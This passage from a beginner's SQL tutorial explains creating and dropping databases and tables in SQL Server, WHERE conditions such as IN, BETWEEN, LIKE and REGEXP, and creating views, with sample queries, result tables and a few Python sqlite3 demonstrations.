Create database Employee;
Click on the Execute button, the one with a red exclamation mark. After
execution, you will see a message stating that your command ran
successfully. Now, to see the newly created database, go to the left side of
your screen, where a navigation panel is present. Look for the folder named
'Databases' and expand it. You will now see the list of databases present in
the current instance of SQL.
Now, let's look at a way you can create a database by using the navigation
panel. Right-click on the Databases folder, and then select the 'New
Database' option. Once you do that, a new window will open up. Use this
window to pass on the name of your database, and click on the "OK" button.
If all goes well, you will now have a new database. You can go to the
navigation panel and look through the list of databases for your newly
created database.
To select your newly created database, you can use the following SQL
statement before writing the rest of your SQL query:
Use Employee;
The aforementioned statement ensures that your query will be executed on
the database you explicitly mentioned. You can also select your desired
database using SQL Server's GUI. Near the New Query option, there is a
drop-down list that contains the names of all the databases present in the
current instance of SQL. Go ahead and select your database from that
drop-down list.
Now that we have talked about how to create and select a database in SQL
Server, let's move on and see how you can safely delete or drop one. When
you perform a drop operation on a database, the database is deleted
permanently from the SQL Server instance. I will drop the Employee
database that I created for this tutorial. This database doesn't contain any
data so far, but that makes no difference to the DROP statement.
Here’s the query to drop the database:
Example:
Drop Database Employee;
If all things go well, you will see the following message as an output in the
messages window.
Output:
Command(s) completed successfully.
So now, let's see how you can drop a database using SQL Server's graphical
user interface. Right-click on the name of the database that you want to
delete (make sure you have created a test database for this exercise). After
you right-click on the name of a database, you will see the Delete option;
click on it. A new window will open up; make sure you check the box that
says 'Close existing connections', available at the bottom of the window.
Closing existing connections allows you to safely delete your database. With
queries, this happens automatically, but when you delete your database using
the GUI, you need to select this option so that if some project is using the
database, the connection to that project is closed before the drop operation
proceeds. That's all you need to know about databases at this point of your
learning curve.
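For intuition, other database engines make the create/drop pair very concrete. In SQLite, for example, a database is simply a file, so "creating" one is connecting to a new file and "dropping" it is deleting that file (a sketch via Python's sqlite3; SQL Server instead manages databases inside a server instance with CREATE DATABASE and DROP DATABASE):

```python
import os
import sqlite3
import tempfile

# Creating a database in SQLite: connect to a file that does not exist yet.
db_path = os.path.join(tempfile.mkdtemp(), "Employee.db")
conn = sqlite3.connect(db_path)
conn.execute("CREATE TABLE t (x INT)")  # forces the file to be written
conn.commit()
conn.close()
created = os.path.exists(db_path)

# Dropping it: delete the file.
os.remove(db_path)
dropped = not os.path.exists(db_path)
```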
Chapter 8 Tables
Tables are data structures that hold some sort of data. In SQL, tables are often
referred to as relations too. The reason behind tables being called relations is
that relationships like one to one, one to many, and many to many exist
between tables. I will talk about these relations and what they mean in a later
part of this book, so let’s just focus here on tables. In this chapter, I will teach
you guys how you can create, alter, and delete/drop a table. I will also give
you a peek into how you can select data from a single table in this chapter.
We will talk about complex select queries later on in this book, so don’t
worry.
So, let's start with creating a table. In order to create a table, you must have
a database to hold all your tables and their data. I took the liberty of setting
up an Employee database in my SQL Server. Go on and create the Employee
database.
I am assuming that you have successfully created a database. Write the
following query in the new query text editor:
Example:
Use Employee;
CREATE TABLE Employee (
StafID INT NOT NULL,
StafName VARCHAR (20) NOT NULL,
StafAGE INT NOT NULL,
StafADDRESS CHAR (25),
StafSALARY DECIMAL (18, 2),
PRIMARY KEY (StafID)
);
Output:
Command(s) completed successfully.
The example above contains an SQL query that will use the Employee
database and create a table inside it. The name of that table is Employee, as
you can see in the second line of the query. StafID, StafName, StafAGE,
StafADDRESS, and StafSALARY are the columns/attributes of this table.
Right next to the name of each column, its datatype is mentioned. The NOT
NULL specifier tells SQL Server that the column can't hold NULL values.
That means you have to pass a value for the non-nullable columns when you
insert data into this table.
PRIMARY KEY (StafID)
The line above says that the StafID column will be used as the primary key
column. Primary keys have certain properties, i.e., the primary key column
must hold unique values, and each primary key value is related to an entire
tuple or record in an SQL table.
Now that we have created a table, let’s insert some data into it. I will use the
Employee database to add details about different employees using the
employee table. The query to insert data in a table looks like the following
example:
Example:
Insert into Employee
(StafID,StafName,StafAGE,StafADDRESS,StafSALARY)
Values(1,'John','23','America', '5000');
Insert into Employee
(StafID,StafName,StafAGE,StafADDRESS,StafSALARY)
Values(2,'Mike','32','Africa', '4000');
Insert into Employee
(StafID,StafName,StafAGE,StafADDRESS,StafSALARY)
Values(3,'Sara','43','America', '6000');
Insert into Employee
(StafID,StafName,StafAGE,StafADDRESS,StafSALARY)
Values(4,'Aaron','56','America', '15000');
Insert into Employee
(StafID,StafName,StafAGE,StafADDRESS,StafSALARY)
Values(5,'Talha','24','Pakistan', '10000');
Output:
(1 row(s) affected)
(1 row(s) affected)
(1 row(s) affected)
(1 row(s) affected)
(1 row(s) affected)
So far, we have created a database and added a table to it. In the example
above, I inserted data into the Employee table. The output of the query only
shows whether the query was successful and, if so, how many rows it
affected, as you can see above. Now, let's see how you can view the data
present in a table. To see the contents of an SQL table, we can use the SQL
SELECT statement.
Example:
/****** Script for SelectTopNRows command from SSMS ******/
SELECT TOP 1000 [StafID]
,[StafName]
,[StafAGE]
,[StafADDRESS]
,[StafSALARY]
FROM [Employee].[dbo].[Employee];
The query above selects the top 1000 rows of the Employee table. You can
select all records by removing TOP 1000. If you don't want to mention the
column names in a query, you can simply put an asterisk after the SELECT
keyword:
/****** Script for SelectTopNRows command from SSMS ******/
SELECT * FROM [Employee].[dbo].[Employee];
The output of both queries mentioned above will be following:
Output:
StafID StafName StafAGE StafADDRESS StafSALARY
1 John 23 America 5000.00
2 Mike 32 Africa 4000.00
3 Sara 43 America 6000.00
4 Aaron 56 America 15000.00
5 Talha 24 Pakistan 10000.00
You can truncate an SQL table using the SQL command TRUNCATE.
Truncate deletes all the data inside a table, but it doesn't delete or modify the
structure of the table. After a successful truncate operation, you will be left
with an empty table. To truncate the Employee table, use the following query:

Example:
Truncate Table Employee;
Output:
Command(s) completed successfully.
Now, if you select the records of the Employee table, you will find that it's
empty and the records you inserted earlier are gone. If you want to drop the
table and its data, use the DROP command.
Example:
Drop Table Employee;
Output:
Command(s) completed successfully.
After the successful execution of the DROP command, the Employee table
will be deleted.
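The whole create/insert/empty/drop cycle above can be sketched with SQLite via Python's sqlite3 (SQLite has no TRUNCATE keyword; an unqualified DELETE is its equivalent, emptying the table while leaving the structure intact):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("""
    CREATE TABLE Employee (
        StafID INT PRIMARY KEY,
        StafName TEXT NOT NULL
    )
""")
cur.executemany("INSERT INTO Employee VALUES (?, ?)",
                [(1, 'John'), (2, 'Mike'), (3, 'Sara')])

# Empty the table without touching its structure (TRUNCATE equivalent).
cur.execute("DELETE FROM Employee")
rows_left = cur.execute("SELECT COUNT(*) FROM Employee").fetchone()[0]

# DROP removes the table itself.
cur.execute("DROP TABLE Employee")
tables = cur.execute(
    "SELECT name FROM sqlite_master WHERE type = 'table'").fetchall()
```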
There exist three relationship types between tables. A one-to-one
relationship between two tables means that a single record from table A is
associated with only a single row in table B. A one-to-many relationship
means that a single record from table A can be related to more than one
record in table B. For example, a single employee, Aaron, could serve more
than one customer; hence, a one-to-many relationship exists between
employees and customers. In a many-to-many relationship, multiple rows
from table A can be associated with multiple rows of table B. For example, a
course can have many registered students, and a student can register for
more than one course. The list of examples goes on and on. It will be a good
exercise for you to come up with at least five examples of each relationship
type.
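In practice, a many-to-many relationship is modeled with a third "junction" table that holds pairs of keys. A sketch of the students/courses example, using SQLite via Python's sqlite3 (all table and column names here are assumed for illustration):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.executescript("""
    CREATE TABLE Students (id INT PRIMARY KEY, name TEXT);
    CREATE TABLE Courses  (id INT PRIMARY KEY, title TEXT);
    -- The junction table turns one many-to-many relationship into
    -- two one-to-many relationships.
    CREATE TABLE Registrations (
        student_id INT REFERENCES Students (id),
        course_id  INT REFERENCES Courses (id)
    );
    INSERT INTO Students VALUES (1, 'Ana'), (2, 'Ben');
    INSERT INTO Courses  VALUES (10, 'SQL'), (20, 'Python');
    INSERT INTO Registrations VALUES (1, 10), (1, 20), (2, 10);
""")

# Both students registered for 'SQL'; Ana also takes 'Python'.
sql_students = cur.execute("""
    SELECT s.name FROM Students s
    JOIN Registrations r ON r.student_id = s.id
    JOIN Courses c ON c.id = r.course_id
    WHERE c.title = 'SQL' ORDER BY s.name
""").fetchall()
```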
Chapter 9 Defining Your Condition
There is no doubt that a data server can handle many complications,
provided everything is defined clearly. Conditions are defined with the help
of expressions, which may consist of numbers, strings, built-in functions,
subqueries, etc. Furthermore, conditions always use operators, which may be
comparison operators (=, !=, <, >, <>, LIKE, IN, BETWEEN, etc.) or
arithmetic operators (+, -, *, /). All these things are used together to form a
condition. Now let's move on to condition types.
Types of Conditions
In order to remove unwanted data from our search, we can use these
conditions. Let’s have a look at some of these condition types.
Equality Condition
Conditions that use the equal sign ‘=’ to equate one condition to another are
referred to as equality conditions. You have used this condition many times at
this point.
If we want to know the name of the HOD of the Genetic Engineering
department, we would do the following:
(1) First, go to the ENGINEERING_STUDENTS table and find the
ENGG_ID for the ENGG_NAME 'Genetic':
SELECT ENGG_ID FROM ENGINEERING_STUDENTS WHERE
ENGG_NAME ='Genetic';
+ - - - - - - - -+
| ENGG_ID |
+ - - - - - - - -+
| 3 |
+ - - - - - - - -+
(2) Then go to Dept_Data table and find the value in HOD column for
ENGG_ID = 3.
SELECT HOD FROM DEPT_DATA where ENGG_ID='3';
+--------------+
| HOD          |
+--------------+
| Victoria Fox |
+--------------+
In the first step, we equated the value of the column ENGG_NAME to the
string value 'Genetic'. We can also combine both steps into a single query
with a join:
SELECT e.ENGG_NAME, e.STUDENT_STRENGTH, d.HOD, d.NO_OF_Prof
FROM ENGINEERING_STUDENTS e INNER JOIN DEPT_DATA d
ON e.ENGG_ID = d.ENGG_ID
WHERE e.ENGG_NAME = 'Genetic';
+-----------+------------------+--------------+------------+
| ENGG_NAME | STUDENT_STRENGTH | HOD          | NO_OF_Prof |
+-----------+------------------+--------------+------------+
| Genetic   | 75               | Victoria Fox | 7          |
+-----------+------------------+--------------+------------+
In the above query, we get all the information in one result set by using an
INNER JOIN and applying the equality condition twice.
Inequality Condition
The inequality condition is the opposite of equality condition and is
expressed by ‘!=’ and the ‘<>’ symbol.
SELECT e.ENGG_NAME, e.STUDENT_STRENGTH, d.HOD, d.NO_OF_Prof
FROM ENGINEERING_STUDENTS e INNER JOIN DEPT_DATA d
ON e.ENGG_ID = d.ENGG_ID
WHERE e.ENGG_NAME <> 'Genetic';
+-------------------+------------------+------------------+------------+
| ENGG_NAME         | STUDENT_STRENGTH | HOD              | NO_OF_Prof |
+-------------------+------------------+------------------+------------+
| Electronics       | 150              | Miley Andrews    | 7          |
| Software          | 250              | Alex Dawson      | 6          |
| Mechanical        | 150              | Anne Joseph      | 5          |
| Biomedical        | 72               | Sophia Williams  | 8          |
| Instrumentation   | 80               | Olive Brown      | 4          |
| Chemical          | 75               | Joshua Taylor    | 6          |
| Civil             | 60               | Ethan Thomas     | 5          |
| Electronics & Com | 250              | Michael Anderson | 8          |
| Electrical        | 60               | Martin Jones     | 5          |
+-------------------+------------------+------------------+------------+
The statement is the same as saying:
SELECT e.ENGG_NAME, e.STUDENT_STRENGTH, d.HOD, d.NO_OF_Prof
FROM ENGINEERING_STUDENTS e INNER JOIN DEPT_DATA d
ON e.ENGG_ID = d.ENGG_ID
WHERE e.ENGG_NAME != 'Genetic';
If you execute the above statement on the command window, you will
receive the same result set.
Using the equality condition to modify data
Suppose the institute decides to close the Genetic department; in that case, it
is important to delete its records from the database as well.
First, find out the ENGG_ID for 'Genetic' so that we know which rows to
remove:
SELECT * FROM ENGINEERING_STUDENTS WHERE
ENGG_NAME='Genetic';
+ - - - - - - - - - + - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - - +
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+ - - - - - - - - - + - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - - +
| 3 | Genetic | 75 |
+ - - - - - - - - - + - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - - +
Now from DEPT_DATA we will DELETE the row having ENGG_ID =’3’
DELETE FROM DEPT_DATA WHERE ENGG_ID ='3';
Next, we need to check if the data has been actually deleted or not:
SELECT * FROM DEPT_DATA;
+ - - - - - -+ - - - - - - - - - - - -+ - - - - - - - - - + - - - - - - - -+
| Dept_ID | HOD | NO_OF_Prof | ENGG_ID |
+ - - - - - -+ - - - - - - - - - - - -+ - - - - - - - - - + - - - - - - - -+
| 100 | Miley Andrews | 7 | 1|
| 101 | Alex Dawson |6 | 2|
| 103 | Anne Joseph |5 | 4|
| 104 | Sophia Williams |8 | 5|
| 105 | Olive Brown |4 | 6|
| 106 | Joshua Taylor |6 | 7|
| 107 | Ethan Thomas |5 | 8|
| 108 | Michael Anderson | 8 | 9|
| 109 | Martin Jones |5 | 10 |
+ - - - - - -+ - - - - - - - - - - - -+ - - - - - - - - - + - - - - - - - -+
Then delete the row from ENGINEERING_STUDENTS where the
ENGG_ID is 3.
DELETE FROM ENGINEERING_STUDENTS WHERE ENGG_ID='3';
Lastly, check if the row has been deleted from
ENGINEERING_STUDENTS:
SELECT * FROM ENGINEERING_STUDENTS;
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| 1 | Electronics | 150 |
| 2 | Software | 250 |
| 4 | Mechanical | 150 |
| 5 | Biomedical | 72 |
| 6 | Instrumentation | 80 |
| 7 | Chemical | 75 |
| 8 | Civil | 60 |
| 9 | Electronics & Com | 250 |
| 10 | Electrical | 60 |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - - +
Note that the records have been successfully deleted from both tables.
The equality condition can be used in the same way to update data as well.
Conditions used to define range
We have seen examples of ranges previously, but we will delve a little deeper
to solidify that knowledge. We want to write queries that define a range to
ensure our expression falls within the desired range.
SELECT * FROM ENGINEERING_STUDENTS WHERE
STUDENT_STRENGTH > 175;
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| 2 | Software | 250 |
| 9 | Electronics & Com | 250 |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
Have a look at another simple example:
SELECT * FROM ENGINEERING_STUDENTS WHERE
300>STUDENT_STRENGTH AND STUDENT_STRENGTH>78;
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| 1 | Electronics | 150 |
| 2 | Software | 250 |
| 4 | Mechanical | 150 |
| 6 | Instrumentation | 80 |
| 9 | Electronics & Com | 250 |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
Next, we will define the same query using the BETWEEN operator. While
defining a range using the BETWEEN operator, specify the lesser value first
and the higher value later.
SELECT * FROM ENGINEERING_STUDENTS WHERE
STUDENT_STRENGTH BETWEEN 78 AND 300;
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| 1 | Electronics | 150 |
| 2 | Software | 250 |
| 4 | Mechanical | 150 |
| 6 | Instrumentation | 80 |
| 9 | Electronics & Com | 250 |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
Membership Conditions
Sometimes the requirement is not to look for values in a range, but in a set of
specific values. To give you a better idea, suppose that you need to find the
details for 'Electronics', 'Instrumentation', and 'Mechanical':
SELECT * FROM ENGINEERING_STUDENTS WHERE ENGG_NAME
= 'Electronics' OR ENGG_NAME = 'Mechanical' OR ENGG_NAME =
'Instrumentation';
+---------+-------------+------------------+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+---------+-------------+------------------+
| 1 | Electronics | 150 |
| 4 | Mechanical | 150 |
| 6 | Instrumentation | 80 |
+---------+-------------+------------------+
We can simplify the above query and get the right result sets using the IN
operator:
SELECT * FROM ENGINEERING_STUDENTS WHERE ENGG_NAME
IN ('Electronics', 'Instrumentation', 'Mechanical');
+---------+-------------+------------------+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+---------+-------------+------------------+
| 1 | Electronics | 150 |
| 4 | Mechanical | 150 |
| 6 | Instrumentation | 80 |
+---------+-------------+------------------+
In the same way, if you want to find the data for engineering fields other
than 'Electronics', 'Mechanical', and 'Instrumentation', use the NOT IN
operator as shown below:
SELECT * FROM ENGINEERING_STUDENTS WHERE ENGG_NAME
NOT IN ('Electronics', 'Instrumentation', 'Mechanical');
+---------+-------------+------------------+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+---------+-------------+------------------+
| 2 | Software | 250 |
| 5 | Biomedical | 72 |
| 7 | Chemical | 75 |
| 8 | Civil | 60 |
| 9 | Electronics & Com | 250 |
| 10 | Electrical | 60 |
+---------+-------------+------------------+
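The IN and BETWEEN conditions above can be sketched with SQLite via Python's sqlite3, using a subset of the same rows (data reproduced from the tables above):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("CREATE TABLE ENGINEERING_STUDENTS "
            "(ENGG_ID INT, ENGG_NAME TEXT, STUDENT_STRENGTH INT)")
cur.executemany("INSERT INTO ENGINEERING_STUDENTS VALUES (?, ?, ?)", [
    (1, 'Electronics', 150), (2, 'Software', 250),
    (4, 'Mechanical', 150), (6, 'Instrumentation', 80),
])

# Membership condition: match any value in the listed set.
in_rows = cur.execute("""
    SELECT ENGG_NAME FROM ENGINEERING_STUDENTS
    WHERE ENGG_NAME IN ('Electronics', 'Instrumentation', 'Mechanical')
    ORDER BY ENGG_ID
""").fetchall()

# Range condition: BETWEEN is inclusive at both ends, lesser value first.
between_rows = cur.execute("""
    SELECT ENGG_NAME FROM ENGINEERING_STUDENTS
    WHERE STUDENT_STRENGTH BETWEEN 78 AND 300
    ORDER BY ENGG_ID
""").fetchall()
```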
Matching Conditions
Suppose you meet all the HODs of the college in a meeting and you are very
impressed by one of them, but you only remember that the name starts with
'S'. You can use the following query to find the right person:
SELECT * FROM DEPT_DATA WHERE LEFT(HOD,1)='S';
Here we are using the function LEFT(). It takes two parameters: the first is
the string to extract from; here, we use the column HOD. The second
determines how many characters should be extracted from the left.
In this case, we remember the name starts with 'S', so we simply extract the
first letter of each name in the HOD column and check whether it matches
'S'. The result is shown below:
+------+-----------+---------+---------+
| Dept_ID | HOD | NO_OF_Prof | ENGG_ID |
+------+-----------+---------+---------+
| 104 | Sophia Williams | 8 | 5|
+------+-----------+---------+---------+
One more demonstration to help reinforce the concept:
Suppose you want to look for people having the names starting with ‘Mi’:
SELECT * FROM DEPT_DATA WHERE LEFT(HOD,2)='Mi';
+- - - - - - - - + - - - - - - - - - - - - - + - - - - - - - - - + - - - - - - - -+
| Dept_ID | HOD | NO_OF_Prof | ENGG_ID |
+- - - - - - - - + - - - - - - - - - - - - - + - - - - - - - - - + - - - - - - - -+
| 100 | Miley Andrews |7 | 1|
| 108 | Michael Anderson | 8 | 9|
+- - - - - - - - + - - - - - - - - - - - - - + - - - - - - - - - + - - - - - - - -+
Pattern Matching
Pattern matching is another interesting feature you will enjoy and use often
as a developer. The concept is simple: it allows you to use an underscore
( _ ) to match any single character and a percent sign (%) to match zero, one,
or more characters. Before moving ahead, know that two comparison
operators, LIKE and NOT LIKE, are used in pattern matching. Now on to
the exercises:
Here is the same example where we want to find out the HOD with a name
starting with ‘S’.
SELECT * FROM DEPT_DATA WHERE HOD LIKE 'S%';
+------+-----------+---------+---------+
| Dept_ID | HOD | NO_OF_Prof | ENGG_ID |
+------+-----------+---------+---------+
| 104 | Sophia Williams | 8 | 5|
+------+-----------+---------+---------+
Now, let’s look for HOD having name ending with ‘ws’:
SELECT * FROM DEPT_DATA WHERE HOD LIKE '%ws';
+ - - - - - -+ - - - - - - - - - - + - - - - - - - - - -+ - - - - - - - -+
| Dept_ID | HOD | NO_OF_Prof | ENGG_ID |
+ - - - - - -+ - - - - - - - - - - + - - - - - - - - - -+ - - - - - - - -+
| 100 | Miley Andrews | 7 | 1|
+ - - - - - -+ - - - - - - - - - - + - - - - - - - - - -+ - - - - - - - -+
Let’s see if we can find a name containing the string ‘cha’.
SELECT * FROM DEPT_DATA WHERE HOD LIKE '%cha%';
+ - - - - - -+ - - - - - - - - - - - - -+ - - - - - - - - - -+ - - - - - - - -+
| Dept_ID | HOD | NO_OF_Prof | ENGG_ID |
+ - - - - - -+ - - - - - - - - - - - - -+ - - - - - - - - - -+ - - - - - - - -+
| 108 | Michael Anderson | 8 | 9|
+ - - - - - -+ - - - - - - - - - - - - -+ - - - - - - - - - -+ - - - - - - - -+
The next example shows how to look for a five-letter word with 'i' as the
second letter:
SELECT * FROM ENGINEERING_STUDENTS WHERE ENGG_NAME
LIKE '_i___';
+ - - - - - - - - -+ - - - - - - - - - - - + - - - - - - - - - - - - - - - - - -+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+ - - - - - - - - -+ - - - - - - - - - - - + - - - - - - - - - - - - - - - - - -+
| 8 | Civil | 60 |
+ - - - - - - - - -+ - - - - - - - - - - - + - - - - - - - - - - - - - - - - - -+
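The LIKE patterns above behave the same way in SQLite, which can be verified via Python's sqlite3 (a subset of the DEPT_DATA rows is reproduced for the demonstration):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("CREATE TABLE DEPT_DATA (Dept_ID INT, HOD TEXT)")
cur.executemany("INSERT INTO DEPT_DATA VALUES (?, ?)", [
    (100, 'Miley Andrews'), (104, 'Sophia Williams'), (108, 'Michael Anderson'),
])

# '%' matches any run of characters; '_' matches exactly one character.
starts_with_s = cur.execute(
    "SELECT HOD FROM DEPT_DATA WHERE HOD LIKE 'S%'").fetchall()
ends_with_ws = cur.execute(
    "SELECT HOD FROM DEPT_DATA WHERE HOD LIKE '%ws'").fetchall()
```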
Regular Expressions
To add more flexibility to your search operations, you can make use of
Regular expressions. It is a vast topic, so here are a few tips to make you
comfortable when utilizing regular expressions:

'^' indicates the beginning of a string.
'$' indicates the end of a string.
'.' denotes any single character.
[...] matches any character listed between the square brackets.
[^...] matches any character not listed between the square brackets.
p1|p2|p3 matches any of the given patterns p1, p2, or p3.
'*' denotes zero or more occurrences of the preceding element.
'+' indicates one or more occurrences of the preceding element.
{n} indicates exactly n instances of the preceding element.
{m,n} indicates m through n instances of the preceding element.
Here are a few examples of regular expressions;
Find all HOD having names that start with ‘M’:
SELECT * FROM DEPT_DATA WHERE HOD REGEXP '^M';
+ - - - - - - + - - - - - - - - - - - - - + - - - - - - - - - -+ - - - - - - - +
| Dept_ID | HOD | NO_OF_Prof | ENGG_ID |
+ - - - - - - + - - - - - - - - - - - - - + - - - - - - - - - -+ - - - - - - - +
| 100 | Miley Andrews |7 | 1|
| 108 | Michael Anderson | 8 | 9|
| 109 | Martin Jones |5 | 10 |
+ - - - - - - + - - - - - - - - - - - - - + - - - - - - - - - -+ - - - - - - - +
Look for HOD names that end with ‘ws’;
SELECT * FROM DEPT_DATA WHERE HOD REGEXP 'ws$';
+ - - - - - + - - - - - - - - - - -+ - - - - - - - - - + - - - - - - - - +
| Dept_ID | HOD | NO_OF_Prof | ENGG_ID |
+ - - - - - + - - - - - - - - - - -+ - - - - - - - - - + - - - - - - - -+
| 100 | Miley Andrews | 7 | 1|
+ - - - - - + - - - - - - - - - - -+ - - - - - - - - - + - - - - - - - +
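Support for REGEXP varies by engine: MySQL ships an implementation, while SQLite defines the operator but leaves the function to you. For experimenting, you can supply one from Python's re module via sqlite3 (a sketch; the rows are a subset of DEPT_DATA above):

```python
import re
import sqlite3

conn = sqlite3.connect(":memory:")
# SQLite translates "X REGEXP Y" into a call to regexp(Y, X),
# so the user function receives (pattern, string).
conn.create_function("REGEXP", 2,
                     lambda pat, s: re.search(pat, s) is not None)

cur = conn.cursor()
cur.execute("CREATE TABLE DEPT_DATA (Dept_ID INT, HOD TEXT)")
cur.executemany("INSERT INTO DEPT_DATA VALUES (?, ?)", [
    (100, 'Miley Andrews'), (104, 'Sophia Williams'), (109, 'Martin Jones'),
])

starts_with_m = cur.execute(
    "SELECT HOD FROM DEPT_DATA WHERE HOD REGEXP '^M' ORDER BY Dept_ID"
).fetchall()
```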
NULL
Before we end this chapter, here is something you must know about the
NULL operator. NULL is defined as the absence of a value. An expression
can be NULL, but it cannot be equal to NULL. Also, two NULL values are
never equal to each other. Whenever you have to check whether a value is
NULL, don't write WHERE COLUMN_NAME = NULL. The proper method
is to write WHERE COLUMN_NAME IS NULL.
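The difference is easy to demonstrate with SQLite via Python's sqlite3: comparing against NULL with '=' never matches, while IS NULL does (table and column names assumed for illustration):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("CREATE TABLE T (ID INT, NOTE TEXT)")
cur.executemany("INSERT INTO T VALUES (?, ?)", [(1, None), (2, 'hello')])

# '= NULL' evaluates to NULL for every row, so nothing matches.
eq_null = cur.execute("SELECT ID FROM T WHERE NOTE = NULL").fetchall()
# 'IS NULL' is the correct test and finds the row.
is_null = cur.execute("SELECT ID FROM T WHERE NOTE IS NULL").fetchall()
```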
Chapter 10 Views
VIEWS are virtual tables: stored SQL queries in the database that have
predefined queries and unique names. They are, in effect, the result tables of
your SQL queries.
As a beginner, you may want to learn how you can use VIEWS. Among
their numerous uses is their flexibility: a view can combine rows and
columns from several tables.
Here are important pointers and advantages in using VIEWS:

1. You can summarize data from different tables, or a subset of
columns from various tables.
2. You can control what users of your databases can see, and
restrict what you don’t want them to view.
3. You can organize your database for your users’ easy
manipulation, while simultaneously protecting your non-public
files.
4. You can modify, or edit, or UPDATE your data. Sometimes
there are limitations, though, such as, being able to access only
one column when using VIEW.
5. You can create columns from various tables for your reports.
6. You can increase the security of your databases because
VIEWS can display only the information that you want
displayed. You can protect specific information from other
users.
7. You can provide easy and efficient accessibility or access paths
to your data to users.
8. You can allow users of your databases to derive various tables
from your data without dealing with the complexity of your
databases.
9. You can rename columns through views. If you are a website
owner, VIEWS can also provide domain support.
10. The WHERE clause in the SQL VIEWS query may not contain
subqueries.
11. For the INSERT keyword to function, you must include all
NOT NULL columns from the original table.
12. Do not use the WITH ENCRYPTION clause for your VIEWS
(unless utterly necessary) because you may not be able to retrieve
the original SQL definition afterwards.
13. Avoid creating VIEWS for each base table (original table). This
can add more workload in managing your databases. As long as
you create your base SQL query properly, there is no need to
create VIEWS for each base table.
14. VIEWS that use the DISTINCT and ORDER BY clauses or
keywords may not produce the expected results.
15. VIEWS can be updated under the condition that the SELECT
clause may not contain the summary functions; and/or the set
operators, and the set functions.
16. When UPDATING, there should be a synchronization of your
base table with your VIEWS table. Therefore, you must
analyze the VIEW table, so that the data presented are still
correct, each time you UPDATE the base table.
17. Avoid creating VIEWS that are unnecessary because this will
clutter your catalogue.
18. Specify “column_names” clearly.
19. The FROM clause of the SQL VIEWS query may not contain
many tables, unless specified.
20. The SQL VIEWS query may not contain HAVING or GROUP
BY.
21. The SELECT keyword can join your VIEW table with your
base table.
How to create VIEWS
You can create VIEWS through the following easy steps:
Step #1 - Check if your system is appropriate to implement VIEW queries.
Step #2 - Make use of the CREATE VIEW SQL statement.
Step #3 – Use key words for your SQL syntax just like with any other SQL
main queries.
Step #4 – Your basic CREATE VIEW statement or syntax will appear like
this:
Example: CREATE VIEW “view_name” AS
SELECT “column_name1”
FROM “table_name”
WHERE [condition];
Let’s have a specific example based on our original table.
EmployeesSalary
Names Age Salary City
Williams, Michael 22 30000.00 Casper
Colton, Jean 24 37000.00 San Diego
Anderson, Ted 30 45000.00 Laramie
Dixon, Allan 27 43000.00 Chicago
Clarkson, Tim 25 35000.00 New York
Alaina, Ann 32 41000.00 Ottawa
Rogers, David 29 50000.00 San Francisco
Lambert, Jancy 38 47000.00 Los Angeles
Kennedy, Tom 27 34000.00 Denver
Schultz, Diana 40 46000.00 New York
Based on the table above, you may want to create a view of the employees’
Names and City only. This is how you should write your statement.
Example: CREATE VIEW EmployeesSalary_VIEW AS
SELECT Names, City
FROM EmployeesSalary;
From the resulting VIEW table, you can now create a query such as the
statement below.
SELECT * FROM EmployeesSalary_VIEW;
This SQL query will display a table that will appear this way:
EmployeesSalary
Names City
Williams, Michael Casper
Colton, Jean San Diego
Anderson, Ted Laramie
Dixon, Allan Chicago
Clarkson, Tim New York
Alaina, Ann Ottawa
Rogers, David San Francisco
Lambert, Jancy Los Angeles
Kennedy, Tom Denver
Schultz, Diana New York
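The whole sequence above (base table, CREATE VIEW, then querying the view like a table) can be sketched in a few runnable lines. This uses Python's built-in sqlite3 module purely for illustration, with only two of the sample rows loaded:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE EmployeesSalary (Names TEXT, Age INTEGER, Salary REAL, City TEXT)")
conn.executemany("INSERT INTO EmployeesSalary VALUES (?, ?, ?, ?)", [
    ("Williams, Michael", 22, 30000.00, "Casper"),
    ("Colton, Jean", 24, 37000.00, "San Diego"),
])

# The view stores the query, not the data: it always reflects the base table.
conn.execute("""CREATE VIEW EmployeesSalary_VIEW AS
                SELECT Names, City FROM EmployeesSalary""")

rows = conn.execute("SELECT * FROM EmployeesSalary_VIEW").fetchall()
print(rows)   # [('Williams, Michael', 'Casper'), ('Colton, Jean', 'San Diego')]
```

Because the view holds no data of its own, any later change to EmployeesSalary shows up in EmployeesSalary_VIEW automatically.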
